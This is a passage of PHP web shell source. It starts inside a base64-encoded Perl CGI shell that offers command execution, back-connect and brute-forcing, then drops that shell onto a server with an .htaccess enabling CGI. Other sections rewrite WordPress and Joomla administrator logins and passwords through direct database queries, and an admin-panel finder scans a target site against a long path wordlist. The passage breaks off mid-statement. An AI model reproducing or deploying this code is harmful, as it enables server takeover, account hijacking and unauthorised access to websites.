0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFZpZXdMb2cKewoJaWYoJFdpbk5UKQoJewoJCXJldHVybiAiPGgyPjxmb250IHN0eWxlPSdmb250OiAyMHB0IFZlcmRhbmE7Y29sb3I6ICNmZjk5MDA7Jz5Eb24ndCBydW4gb24gV2luZG93czwvZm9udD48L2gyPiI7Cgl9CglteSAkcmVzdWx0PSI8dGFibGU+PHRyPjx0aD5QYXRoIExvZzwvdGg+PHRoPlN1Ym1pdDwvdGg+PC90cj4iOwoJbXkgQHBhdGhsb2c9KAoJCQkJJy91c3IvbG9jYWwvYXBhY2hlL2xvZ3MvZXJyb3JfbG9nJywKCQkJCScvdmFyL2xvZy9odHRwZC9lcnJvcl9sb2cnLAoJCQkJJy91c3IvbG9jYWwvYXBhY2hlL2xvZ3MvYWNjZXNzX2xvZycKCQkJCSk7CglteSAkaT0wOwoJbXkgJHBlcm1zOwoJbXkgJHNsOwoJZm9yZWFjaCBteSAkbG9nIChAcGF0aGxvZykKCXsKCQlpZigtdyAkbG9nKQoJCXsKCQkJJHBlcm1zPSJPSyI7CgkJfWVsc2UKCQl7CgkJCWNob3AoJHNsID0gYGxuIC1zICRsb2cgZXJyb3JfbG9nXyRpYCk7CgkJCWlmKCZ0cmltKCRscykgZXEgIiIpCgkJCXsKCQkJCWlmKC1yICRscykKCQkJCXsKCQkJCQkkcGVybXM9Ik9LIjsKCQkJCQkkbG9nPSJlcnJvcl9sb2dfIi4kaTsKCQkJCX0KCQkJfWVsc2UKCQkJewoJCQkJJHBlcm1zPSI8Zm9udCBzdHlsZT0nY29sb3I6IHJlZDsnPkNhbmNlbDxmb250PiI7CgkJCX0KCQl9CgkJJHJlc3VsdCAuPTw8RU5EOwoJCTx0cj4KCgkJCTxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiPgoJCQk8dGQ+PGlucHV0IHR5cGU9InRleHQiIG9ua2V5dXA9ImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdsb2dfJGknKS52YWx1ZT0nbGVzcyAnICsgdGhpcy52YWx1ZTsiIHZhbHVlPSIkbG9nIiBzaXplPSc1MCcvPjwvdGQ+CgkJCTx0ZD48aW5wdXQgY2xhc3M9InN1Ym1pdCIgdHlwZT0ic3VibWl0IiB2YWx1ZT0iVHJ5IiAvPjwvdGQ+CgkJCTxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJsb2dfJGkiIG5hbWU9ImMiIHZhbHVlPSJsZXNzICRsb2ciLz4KCQkJPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImNvbW1hbmQiIC8+CgkJCTxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciIgLz4KCQkJPC9mb3JtPgoJCQk8dGQ+JHBlcm1zPC90ZD4KCgkJPC90cj4KRU5ECgkJJGkrKzsKCX0KCSRyZXN1bHQgLj0iPC90YWJsZT4iOwoJcmV0dXJuICRyZXN1bHQ7Cn0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIE1haW4gUHJvZ3JhbSAtIEV4ZWN1dGlvbiBTdGFydHMgSGVyZQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiZSZWFkUGFyc2U7CiZHZXRDb29raWVzOwoKJFNjcmlwdExvY2F0aW9uID0gJEVOVnsnU0NSSVBUX05BTUUnfTsKJFNlcnZlck5hbWUgPSAkRU5WeydTRVJWRVJfTkFNRSd9OwokTG9naW5QYXNzd29yZCA9ICRpbnsncCd9OwokUnVuQ29tbWFuZCA9ICRpbnsnYyd9OwokVHJhbnNmZXJGaWxlID0gJGlueydmJ307CiRPcHRpb25zID0gJGlueydvJ307CiRBY3Rpb24gPSAkaW57J2EnfTsKCiRBY3Rpb24gPSAiY29tbWFuZCIgaWYoJEFjdGlvbiBlcSAiIik7ICMgbm8gYWN0aW9uIHNwZWNpZmllZCwgdXNlIGRlZmF1bHQKCiMgZ2V0IHRoZSBkaXJlY3RvcnkgaW4gd2hpY2ggdGhlIGNvbW1hbmRzIHdpbGwgYmUgZXhlY3V0ZWQKJEN1cnJlbnREaXIgPSAmdHJpbSgkaW57J2QnfSk7CiMgbWFjIGRpbmggeHVhdCB0aG9uZyB0aW4gbmV1IGtvIGNvIGxlbmggbmFvIQokUnVuQ29tbWFuZD0gJFdpbk5UPyJkaXIiOiJkaXIgLWxpYSIgaWYoJFJ1bkNvbW1hbmQgZXEgIiIpOwpjaG9wKCRDdXJyZW50RGlyID0gYCRDbWRQd2RgKSBpZigkQ3VycmVudERpciBlcSAiIik7CgokTG9nZ2VkSW4gPSAkQ29va2llc3snU0FWRURQV0QnfSBlcSAkUGFzc3dvcmQ7CgppZigkQWN0aW9uIGVxICJsb2dpbiIgfHwgISRMb2dnZWRJbikgCQkjIHVzZXIgbmVlZHMvaGFzIHRvIGxvZ2luCnsKCSZQZXJmb3JtTG9naW47Cn1lbHNpZigkQWN0aW9uIGVxICJndWkiKSAjIEdVSSBkaXJlY3RvcnkKewoJJlByaW50UGFnZUhlYWRlcjsKCWlmKCEkV2luTlQpCgl7CgkJJGNobW9kPWludCgkaW57J2NobW9kJ30pOwoJCWlmKCEoJGNobW9kIGVxIDApKQoJCXsKCQkJJGNobW9kPWludCgkaW57J2NobW9kJ30pOwoJCQkkZmlsZT0kQ3VycmVudERpci4kUGF0aFNlcC4kVHJhbnNmZXJGaWxlOwoJCQljaG9wKCRyZXN1bHQ9IGBjaG1vZCAkY2htb2QgIiRmaWxlImApOwoJCQlpZigmdHJpbSgkcmVzdWx0KSBlcSAiIikKCQkJewoJCQkJcHJpbnQgIjxydW4+IERvbmUhIDwvcnVuPjxicj4iOwoJCQl9ZWxzZQoJCQl7CgkJCQlwcmludCAiPHJ1bj4gU29ycnkhIFlvdSBkb250IGhhdmUgcGVybWlzc2lvbnMhIDwvcnVuPjxicj4iOwoJCQl9CgkJfQoJfQoJJHJlbmFtZT0kaW57J3JlbmFtZSd9OwoJaWYoISRyZW5hbWUgZXEgIiIpCgl7CgkJaWYocmVuYW1lKCRUcmFuc2ZlckZpbGUsJHJlbmFtZSkpCgkJewoJCQlwcmludCAiPHJ1bj4gRG9uZSEgPC9ydW4+PGJyPiI7CgkJfWVsc2UKCQl7CgkJCXByaW50ICI8cnVuPiBTb3JyeSEgWW91IGRvbnQgaGF2ZSBwZXJtaXNzaW9ucyEgPC9ydW4+PGJyPiI7CgkJfQoJfQoJJHJlbW92ZT0kaW57J3JlbW92ZSd9OwoJaWYoJHJlbW92ZSBuZSAiIikKCXsKCQkkcm0gPSAkQ3VycmVudERpci4kUGF0aFNlcC4kcmVtb3ZlOwoJCWlmKC1kICRybSkKCQl7CgkJCSZSbURpcigkcm0pOwoJCX1lbHNlCgkJewoJCQlpZih1bmxpbmsoJHJtKSkKCQkJewoJCQkJcHJpbnQgIjxydW4+IERvbmUhIDwvcnVuPjxicj4iOwoJCQl9ZWxzZQoJCQl7CgkJCQlwcmludCAiPHJ1bj4gU29ycnkhIFlvdSBkb250IGhhdmUgcGVybWlzc2lvbnMhIDwvcnVuPjxicj4iOwoJCQl9CQkJCgkJfQoJfQoJcHJpbnQgJkxpc3REaXI7Cgp9CmVsc2lmKCRBY3Rpb24gZXEgImNvbW1hbmQiKQkJCQkgCSMgdXNlciB3YW50cyB0byBydW4gYSBjb21tYW5kCnsKCSZQcmludFBhZ2VIZWFkZXIoImMiKTsKCXByaW50ICZFeGVjdXRlQ29tbWFuZDsKfQplbHNpZigkQWN0aW9uIGVxICJzYXZlIikJCQkJIAkjIHVzZXIgd2FudHMgdG8gc2F2ZSBhIGZpbGUKewoJJlByaW50UGFnZUhlYWRlcjsKCWlmKCZTYXZlRmlsZSgkaW57J2RhdGEnfSwkaW57J2ZpbGUnfSkpCgl7CgkJcHJpbnQgIjxydW4+IERvbmUhIDwvcnVuPjxicj4iOwoJfWVsc2UKCXsKCQlwcmludCAiPHJ1bj4gU29ycnkhIFlvdSBkb250IGhhdmUgcGVybWlzc2lvbnMhIDwvcnVuPjxicj4iOwoJfQoJcHJpbnQgJkxpc3REaXI7Cn0KZWxzaWYoJEFjdGlvbiBlcSAidXBsb2FkIikgCQkJCQkjIHVzZXIgd2FudHMgdG8gdXBsb2FkIGEgZmlsZQp7CgkmUHJpbnRQYWdlSGVhZGVyOwoKCXByaW50ICZVcGxvYWRGaWxlOwp9CmVsc2lmKCRBY3Rpb24gZXEgImJhY2tiaW5kIikgCQkJCSMgdXNlciB3YW50cyB0byBiYWNrIGNvbm5lY3Qgb3IgYmluZCBwb3J0CnsKCSZQcmludFBhZ2VIZWFkZXIoImNsaWVudHBvcnQiKTsKCXByaW50ICZCYWNrQmluZDsKfQplbHNpZigkQWN0aW9uIGVxICJicnV0ZWZvcmNlciIpIAkJCSMgdXNlciB3YW50cyB0byBicnV0ZSBmb3JjZQp7CgkmUHJpbnRQYWdlSGVhZGVyOwoJcHJpbnQgJkJydXRlRm9yY2VyOwp9ZWxzaWYoJEFjdGlvbiBlcSAiZG93bmxvYWQiKSAJCQkJIyB1c2VyIHdhbnRzIHRvIGRvd25sb2FkIGEgZmlsZQp7CglwcmludCAmRG93bmxvYWRGaWxlOwp9ZWxzaWYoJEFjdGlvbiBlcSAiY2hlY2tsb2ciKSAJCQkJIyB1c2VyIHdhbnRzIHRvIHZpZXcgbG9nIGZpbGUKewoJJlByaW50UGFnZUhlYWRlcjsKCXByaW50ICZWaWV3TG9nOwoKfWVsc2lmKCRBY3Rpb24gZXEgImRvbWFpbnN1c2VyIikgCQkJIyB1c2VyIHdhbnRzIHRvIHZpZXcgbGlzdCB1c2VyL2RvbWFpbgp7CgkmUHJpbnRQYWdlSGVhZGVyOwoJcHJpbnQgJlZpZXdEb21haW5Vc2VyOwp9ZWxzaWYoJEFjdGlvbiBlcSAibG9nb3V0IikgCQkJCSMgdXNlciB3YW50cyB0byBsb2dvdXQKewoJJlBlcmZvcm1Mb2dvdXQ7Cn0KJlByaW50UGFnZUZvb3Rlcjs=\';\r\n\r\n$file = fopen("cgi2012.izo" ,"w+");\r\n$write = fwrite ($file ,base64_decode($cgi2012));\r\nfclose($file);\r\n    chmod("cgi2012.izo",0755);\r\n   echo " <iframe src=cgi2012/cgi2012.izo width=96% height=76% frameborder=0></iframe>\r\n \r\n </div>"; }\r\n \r\n ///////////////////////////////////////////////////////////////////////////\r\n \r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'config\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=config" method="post">\r\n\r\n<?php\r\n\r\necho "<center/><br/><b><font color=#00ff00>+--==[ Config Shell Priv8 SCR ]==--+</font></b><br><br>";\r\n\r\n  mkdir(\'config\', 0755);\r\n    chdir(\'config\');\r\n        $kokdosya = ".htaccess";\r\n        $dosya_adi = "$kokdosya";\r\n        $dosya = fopen ($dosya_adi , \'w\') or die ("Error cuyy!");\r\n        $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI\r\n\t\t\r\nAddType application/x-httpd-cgi .cpc\r\n\r\nAddHandler cgi-script .izo\r\nAddHandler cgi-script .izo";    \r\n        fwrite ( $dosya , $metin ) ;\r\n        fclose ($dosya);\r\n\r\n$file = fopen("config.izo" ,"w+");\r\n$write = fwrite ($file ,base64_decode($configshell));\r\nfclose($file);\r\n    chmod("config.izo",0755);\r\n   echo "<iframe src=config/config.izo width=97% height=100% frameborder=0></iframe>\r\n   </div>"; \r\n}\r\n/////////////////////////////////////////////////////////////////////////\r\n\r\n\r\n///////////////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'wp-reset\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=wp-reset" method="post">\r\n\r\n<?php\r\n\r\necho "<center/><br/><b><font color=#00ff00>+--==[  Wordpress Reset Password  ]==--+</font></b><br><br>";\r\n  \r\n  if(empty($_POST[\'pwd\'])){\r\n  \r\necho "<FORM method=\'POST\'>\r\n<table class=\'tabnet\' style=\'width:300px;\'> <tr><th colspan=\'2\'>Connect to mySQL server</th></tr> <tr><td>&nbsp;&nbsp;Hostname</td><td>\r\n<input style=\'width:220px;\' class=\'inputz\' type=\'text\' name=\'localhost\' value=\'localhost\' /></td></tr> <tr><td>&nbsp;&nbsp;Database</td><td>\r\n<input style=\'width:220px;\' class=\'inputz\' type=\'text\' name=\'database\' value=\'wp-\' /></td></tr> <tr><td>&nbsp;&nbsp;username</td><td>\r\n<input style=\'width:220px;\' class=\'inputz\' type=\'text\' name=\'username\' value=\'wp-\' /></td></tr> <tr><td>&nbsp;&nbsp;password</td><td>\r\n<input style=\'width:220px;\' class=\'inputz\' type=\'text\' name=\'password\' value=\'**\' /></td></tr>\r\n<tr><td>&nbsp;&nbsp;User baru</td><td>\r\n<input style=\'width:220px;\' class=\'inputz\' type=\'text\' name=\'admin\' value=\'admin\' /></td></tr>\r\n <tr><td>&nbsp;&nbsp;Pass Baru</td><td>\r\n<input style=\'width:80px;\' class=\'inputz\' type=\'text\' name=\'pwd\' value=\'123456\' />&nbsp;\r\n\r\n<input style=\'width:19%;\' class=\'inputzbut\' type=\'submit\' value=\'change!\' name=\'send\' /></FORM>\r\n</td></tr> </table><br><br><br><br>\r\n";\r\n}else{\r\n$localhost = $_POST[\'localhost\'];\r\n$database  = $_POST[\'database\'];\r\n$username  = $_POST[\'username\'];\r\n$password  = $_POST[\'password\'];\r\n$pwd   = $_POST[\'pwd\'];\r\n$admin = $_POST[\'admin\'];\r\n\r\n\r\n @mysql_connect($localhost,$username,$password) or die(mysql_error());\r\n @mysql_select_db($database) or die(mysql_error());\r\n\r\n$hash = crypt($pwd);\r\n$a4s=@mysql_query("UPDATE wp_users SET user_login =\'".$admin."\' WHERE ID = 1") or die(mysql_error());\r\n$a4s=@mysql_query("UPDATE wp_users SET user_pass =\'".$hash."\' WHERE ID = 1") or die(mysql_error());\r\n$a4s=@mysql_query("UPDATE wp_users SET user_login =\'".$admin."\' WHERE ID = 2") or die(mysql_error());\r\n$a4s=@mysql_query("UPDATE wp_users SET user_pass =\'".$hash."\' WHERE ID = 2") or die(mysql_error());\r\n$a4s=@mysql_query("UPDATE wp_users SET user_login =\'".$admin."\' WHERE ID = 3") or die(mysql_error());\r\n$a4s=@mysql_query("UPDATE wp_users SET user_pass =\'".$hash."\' WHERE ID = 3") or die(mysql_error());\r\n$a4s=@mysql_query("UPDATE wp_users SET user_email =\'".$SQL."\' WHERE ID = 1") or die(mysql_error());\r\n\r\n\r\nif($a4s){\r\necho "<b> Success ..!! :)) sekarang bisa login ke wp-admin</b> ";\r\n}\r\n\r\n}\r\n  \r\n  \r\n  echo "\r\n   </div>"; }\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'jm-reset\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=jm-reset" method="post">\r\n\r\n<?php\r\n\r\necho "<center/><br/><b><font color=#00ff00>+--==[  Joomla Reset Password ]==--+</font></b><br><br>";\r\n\tif(empty($_POST[\'pwd\'])){\r\necho "<FORM method=\'POST\'><table class=\'tabnet\' style=\'width:300px;\'> <tr><th colspan=\'2\'>Connect to mySQL </th></tr> <tr><td>&nbsp;&nbsp;Host</td><td>\r\n<input style=\'width:270px;\' class=\'inputz\' type=\'text\' name=\'localhost\' value=\'localhost\' /></td></tr> <tr><td>&nbsp;&nbsp;Database</td><td>\r\n<input style=\'width:270px;\' class=\'inputz\' type=\'text\' name=\'database\' value=\'database\' /></td></tr> <tr><td>&nbsp;&nbsp;username</td><td>\r\n<input style=\'width:270px;\' class=\'inputz\' type=\'text\' name=\'username\' value=\'db_user\' /></td></tr> <tr><td>&nbsp;&nbsp;password</td><td>\r\n<input style=\'width:270px;\' class=\'inputz\' type=\'password\' name=\'password\' value=\'**\' /></td></tr>\r\n<tr><td>&nbsp;&nbsp;User baru</td><td>\r\n<input style=\'width:270px;\' class=\'inputz\' name=\'admin\' value=\'admin\' /></td></tr>\r\n <tr><td>&nbsp;&nbsp;pass baru </td><td>123456 = \r\n<input style=\'width:130px;\' class=\'inputz\' name=\'pwd\' value=\'e10adc3949ba59abbe56e057f20f883e\' />&nbsp;\r\n\r\n<input style=\'width:23%;\' class=\'inputzbut\' type=\'submit\' value=\'change!\' name=\'send\' /></FORM>\r\n</td></tr> </table><br><br><br><br>\r\n";\r\n}else{\r\n$localhost = $_POST[\'localhost\'];\r\n$database  = $_POST[\'database\'];\r\n$username  = $_POST[\'username\'];\r\n$password  = $_POST[\'password\'];\r\n$pwd   = $_POST[\'pwd\'];\r\n$admin = $_POST[\'admin\'];\r\n@mysql_connect($localhost,$username,$password) or die(mysql_error());\r\n@mysql_select_db($database) or die(mysql_error());\r\n$hash = crypt($pwd);\r\n$SQL=@mysql_query("UPDATE jos_users SET username =\'".$admin."\' WHERE ID = 62") or die(mysql_error());\r\n$SQL=@mysql_query("UPDATE jos_users SET password =\'".$pwd."\' WHERE ID = 62") or die(mysql_error());\r\n$SQL=@mysql_query("UPDATE jos_users SET username =\'".$admin."\' WHERE ID = 63") or die(mysql_error());\r\n$SQL=@mysql_query("UPDATE jos_users SET password =\'".$pwd."\' WHERE ID = 63") or die(mysql_error());\r\n$SQL=@mysql_query("UPDATE jos_users SET username =\'".$admin."\' WHERE ID = 64") or die(mysql_error());\r\n$SQL=@mysql_query("UPDATE jos_users SET password =\'".$pwd."\' WHERE ID = 64") or die(mysql_error());\r\n$SQL=@mysql_query("UPDATE jos_users SET username =\'".$admin."\' WHERE ID = 65") or die(mysql_error());\r\n$SQL=@mysql_query("UPDATE jos_users SET password =\'".$pwd."\' WHERE ID = 65") or die(mysql_error());\r\nif($SQL){\r\necho "<b>Success : skarang password barunya >>> - (123456)";\r\n}\r\n}\r\n\t\r\n  echo "\r\n   </div>"; \r\n} \r\n//////////////////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'adfin\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=adfin" method="post">\r\n\r\n<?php\r\nset_time_limit(0);\r\nerror_reporting(0);\r\n$list[\'front\'] ="admin\r\nadm\r\nadmincp\r\nadmcp\r\ncp\r\nmodcp\r\nmoderatorcp\r\nadminare\r\nadmins\r\ncpanel\r\ncontrolpanel";\r\n$list[\'end\'] = "admin1.php\r\nadmin1.html\r\nadmin2.php\r\nadmin2.html\r\nyonetim.php\r\nyonetim.html\r\nyonetici.php\r\nyonetici.html\r\nccms/\r\nccms/login.php\r\nccms/index.php\r\nmaintenance/\r\nwebmaster/\r\nadm/\r\nconfiguration/\r\nconfigure/\r\nwebsvn/\r\nadmin/\r\nadmin/account.php\r\nadmin/account.html\r\nadmin/index.php\r\nadmin/index.html\r\nadmin/login.php\r\nadmin/login.html\r\nadmin/home.php\r\nadmin/controlpanel.html\r\nadmin/controlpanel.php\r\nadmin.php\r\nadmin.html\r\nadmin/cp.php\r\nadmin/cp.html\r\ncp.php\r\ncp.html\r\nadministrator/\r\nadministrator/index.html\r\nadministrator/index.php\r\nadministrator/login.html\r\nadministrator/login.php\r\nadministrator/account.html\r\nadministrator/account.php\r\nadministrator.php\r\nadministrator.html\r\nlogin.php\r\nlogin.html\r\nmodelsearch/login.php\r\nmoderator.php\r\nmoderator.html\r\nmoderator/login.php\r\nmoderator/login.html\r\nmoderator/admin.php\r\nmoderator/admin.html\r\nmoderator/\r\naccount.php\r\naccount.html\r\ncontrolpanel/\r\ncontrolpanel.php\r\ncontrolpanel.html\r\nadmincontrol.php\r\nadmincontrol.html\r\nadminpanel.php\r\nadminpanel.html\r\nadmin1.asp\r\nadmin2.asp\r\nyonetim.asp\r\nyonetici.asp\r\nadmin/account.asp\r\nadmin/index.asp\r\nadmin/login.asp\r\nadmin/home.asp\r\nadmin/controlpanel.asp\r\nadmin.asp\r\nadmin/cp.asp\r\ncp.asp\r\nadministrator/index.asp\r\nadministrator/login.asp\r\nadministrator/account.asp\r\nadministrator.asp\r\nlogin.asp\r\nmodelsearch/login.asp\r\nmoderator.asp\r\nmoderator/login.asp\r\nmoderator/admin.asp\r\naccount.asp\r\ncontrolpanel.asp\r\nadmincontrol.asp\r\nadminpanel.asp\r\nfileadmin/\r\nfileadmin.php\r\nfileadmin.asp\r\nfileadmin.html\r\nadministration/\r\nadministration.php\r\nadministration.html\r\nsysadmin.php\r\nsysadmin.html\r\nphpmyadmin/\r\nmyadmin/\r\nsysadmin.asp\r\nsysadmin/\r\nur-admin.asp\r\nur-admin.php\r\nur-admin.html\r\nur-admin/\r\nServer.php\r\nServer.html\r\nServer.asp\r\nServer/\r\nwp-admin/\r\nadministr8.php\r\nadministr8.html\r\nadministr8/\r\nadministr8.asp\r\nwebadmin/\r\nwebadmin.php\r\nwebadmin.asp\r\nwebadmin.html\r\nadministratie/\r\nadmins/\r\nadmins.php\r\nadmins.asp\r\nadmins.html\r\nadministrivia/\r\nDatabase_Administration/\r\nWebAdmin/\r\nuseradmin/\r\nsysadmins/\r\nadmin1/\r\nsystem-administration/\r\nadministrators/\r\npgadmin/\r\ndirectadmin/\r\nstaradmin/\r\nServerAdministrator/\r\nSysAdmin/\r\nadminister/\r\nLiveUser_Admin/\r\nsys-admin/\r\ntypo3/\r\npanel/\r\ncpanel/\r\ncPanel/\r\ncpanel_file/\r\nplatz_login/\r\nrcLogin/\r\nblogindex/\r\nformslogin/\r\nautologin/\r\nsupport_login/\r\nmeta_login/\r\nmanuallogin/\r\nsimpleLogin/\r\nloginflat/\r\nutility_login/\r\nshowlogin/\r\nmemlogin/\r\nmembers/\r\nlogin-redirect/\r\nsub-login/\r\nwp-login/\r\nlogin1/\r\ndir-login/\r\nlogin_db/\r\nxlogin/\r\nsmblogin/\r\ncustomer_login/\r\nUserLogin/\r\nlogin-us/\r\nacct_login/\r\nadmin_area/\r\nbigadmin/\r\nproject-admins/\r\nphppgadmin/\r\npureadmin/\r\nsql-admin/\r\nradmind/\r\nopenvpnadmin/\r\nwizmysqladmin/\r\nvadmind/\r\nezsqliteadmin/\r\nhpwebjetadmin/\r\nnewsadmin/\r\nadminpro/\r\nLotus_Domino_Admin/\r\nbbadmin/\r\nvmailadmin/\r\nIndy_admin/\r\nccp14admin/\r\nirc-macadmin/\r\nbanneradmin/\r\nsshadmin/\r\nphpldapadmin/\r\nmacadmin/\r\nadministratoraccounts/\r\nadmin4_account/\r\nadmin4_colon/\r\nradmind-1/\r\nSuper-Admin/\r\nAdminTools/\r\ncmsadmin/\r\nSysAdmin2/\r\nglobes_admin/\r\ncadmins/\r\nphpSQLiteAdmin/\r\nnavSiteAdmin/\r\nserver_admin_small/\r\nlogo_sysadmin/\r\nserver/\r\ndatabase_administration/\r\npower_user/\r\nsystem_administration/\r\nss_vms_admin_sm/\r\nadminarea/\r\nbb-admin/\r\nadminLogin/\r\npanel-administracion/\r\ninstadmin/\r\nmemberadmin/\r\nadministratorlogin/\r\nadmin/admin.php\r\nadmin_area/admin.php\r\nadmin_area/login.php\r\nsiteadmin/login.php\r\nsiteadmin/index.php\r\nsiteadmin/login.html\r\nadmin/admin.html\r\nadmin_area/index.php\r\nbb-admin/index.php\r\nbb-admin/login.php\r\nbb-admin/admin.php\r\nadmin_area/login.html\r\nadmin_area/index.html\r\nadmincp/index.asp\r\nadmincp/login.asp\r\nadmincp/index.html\r\nwebadmin/index.html\r\nwebadmin/admin.html\r\nwebadmin/login.html\r\nadmin/admin_login.html\r\nadmin_login.html\r\npanel-administracion/login.html\r\nnsw/admin/login.php\r\nwebadmin/login.php\r\nadmin/admin_login.php\r\nadmin_login.php\r\nadmin_area/admin.html\r\npages/admin/admin-login.php\r\nadmin/admin-login.php\r\nadmin-login.php\r\nbb-admin/index.html\r\nbb-admin/login.html\r\nbb-admin/admin.html\r\nadmin/home.html\r\npages/admin/admin-login.html\r\nadmin/admin-login.html\r\nadmin-login.html\r\nadmin/adminLogin.html\r\nadminLogin.html\r\nhome.html\r\nrcjakar/admin/login.php\r\nadminarea/index.html\r\nadminarea/admin.html\r\nwebadmin/index.php\r\nwebadmin/admin.php\r\nuser.html\r\nmodelsearch/login.html\r\nadminarea/login.html\r\npanel-administracion/index.html\r\npanel-administracion/admin.html\r\nmodelsearch/index.html\r\nmodelsearch/admin.html\r\nadmincontrol/login.html\r\nadm/index.html\r\nadm.html\r\nuser.php\r\npanel-administracion/login.php\r\nwp-login.php\r\nadminLogin.php\r\nadmin/adminLogin.php\r\nhome.php\r\nadminarea/index.php\r\nadminarea/admin.php\r\nadminarea/login.php\r\npanel-administracion/index.php\r\npanel-administracion/admin.php\r\nmodelsearch/index.php\r\nmodelsearch/admin.php\r\nadmincontrol/login.php\r\nadm/admloginuser.php\r\nadmloginuser.php\r\nadmin2/login.php\r\nadmin2/index.php\r\nadm/index.php\r\nadm.php\r\naffiliate.php\r\nadm_auth.php\r\nmemberadmin.php\r\nadministratorlogin.php\r\nadmin/admin.asp\r\nadmin_area/admin.asp\r\nadmin_area/login.asp\r\nadmin_area/index.asp\r\nbb-admin/index.asp\r\nbb-admin/login.asp\r\nbb-admin/admin.asp\r\npages/admin/admin-login.asp\r\nadmin/admin-login.asp\r\nadmin-login.asp\r\nuser.asp\r\nwebadmin/index.asp\r\nwebadmin/admin.asp\r\nwebadmin/login.asp\r\nadmin/admin_login.asp\r\nadmin_login.asp\r\npanel-administracion/login.asp\r\nadminLogin.asp\r\nadmin/adminLogin.asp\r\nhome.asp\r\nadminarea/index.asp\r\nadminarea/admin.asp\r\nadminarea/login.asp\r\npanel-administracion/index.asp\r\npanel-administracion/admin.asp\r\nmodelsearch/index.asp\r\nmodelsearch/admin.asp\r\nadmincontrol/login.asp\r\nadm/admloginuser.asp\r\nadmloginuser.asp\r\nadmin2/login.asp\r\nadmin2/index.asp\r\nadm/index.asp\r\nadm.asp\r\naffiliate.asp\r\nadm_auth.asp\r\nmemberadmin.asp\r\nadministratorlogin.asp\r\nsiteadmin/login.asp\r\nsiteadmin/index.asp\r\nADMIN/\r\npaneldecontrol/\r\nlogin/\r\ncms/\r\nadmon/\r\nADMON/\r\nadministrador/\r\nADMIN/login.php\r\npanelc/\r\nADMIN/login.html";\r\nfunction template() {\r\necho \'\r\n\r\n<script type="text/javascript">\r\n<!--\r\nfunction insertcode($text, $place, $replace)\r\n{\r\n    var $this = $text;\r\n    var logbox = document.getElementById($place);\r\n    if($replace == 0)\r\n        document.getElementById($place).innerHTML = logbox.innerHTML+$this;\r\n    else\r\n        document.getElementById($place).innerHTML = $this;\r\n//document.getElementById("helpbox").innerHTML = $this;\r\n}\r\n-->\r\n</script>\r\n<br>\r\n<br>\r\n<h1 class="technique-two">\r\n       \r\n\r\n\r\n</h1>\r\n\r\n<div class="wrapper">\r\n<div class="red">\r\n<div class="tube">\r\n<center><table class="tabnet"><th colspan="2">Admin Finder</th><tr><td>\r\n<form action="" method="post" name="xploit_form">\r\n\r\n<tr>\r\n<tr>\r\n\t<b><td>URL</td>\r\n\t<td><input class="inputz" type="text" name="xploit_url" value="\'.$_POST[\'xploit_url\'].\'" style="width: 350px;" />\r\n\t</td>\r\n</tr><tr>\r\n\t<td>404 string</td>\r\n\t<td><input class="inputz" type="text" name="xploit_404string" value="\'.$_POST[\'xploit_404string\'].\'" style="width: 350px;" />\r\n\t</td></b>\r\n</tr><br><td>\r\n<span style="float: center;"><input class="inputzbut" type="submit" name="xploit_submit" value=" Start Scan" align="center" />\r\n</span></td></tr>\r\n</form></td></tr>\r\n<br /></table>\r\n</div> <!-- /tube -->\r\n</div> <!-- /red -->\r\n<br />\r\n<div class="green">\r\n<div class="tube" id="rightcol">\r\nVerificat: <span id="verified">0</span> / <span id="total">0</span><br />\r\n<b>Found ones:<br /></b>\r\n</div> <!-- /tube -->\r\n</div></center><!-- /green -->\r\n<br clear="all" /><br />\r\n<div class="blue">\r\n<div class="tube" id="logbox">\r\n<br />\r\n<br />\r\nAdmin page Finder :<br /><br />\r\n</div> <!-- /tube -->\r\n</div> <!-- /blue -->\r\n</div> <!-- /wrapper -->\r\n<br clear="all"><br>\';\r\n}\r\nfunction show($msg, $br=1, $stop=0, $place=\'logbox\', $replace=0) {\r\n    if($br == 1) $msg .= "<br />";\r\n    echo "<script type=\\"text/javascript\\">insertcode(\'".$msg."\', \'".$place."\', \'".$replace."\');</script>";\r\n    if($stop == 1) exit;\r\n    @flush();@ob_flush();\r\n}\r\nfunction check($x, $front=0) {\r\n    global $_POST,$site,$false;\r\n    if($front == 0) $t = $site.$x;\r\n    else $t = \'http://\'.$x.\'.\'.$site.\'/\';\r\n    $headers = get_headers($t);\r\n    if (!eregi(\'200\', $headers[0])) return 0;\r\n    $data = @file_get_contents($t);\r\n    if($_POST[\'xploit_404string\'] == "") if($data == $false) return 0;\r\n    if($_POST[\'xploit_404string\'] != "") if(strpos($data, $_POST[\'xploit_404string\'])) return 0;\r\n    return 1;\r\n}\r\n   \r\n// --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\r\ntemplate();\r\nif(!isset($_POST[\'xploit_url\'])) die;\r\nif($_POST[\'xploit_url\'] == \'\') die;\r\n$site = $_POST[\'xploit_url\'];\r\nif ($site[strlen($site)-1] != "/") $site .= 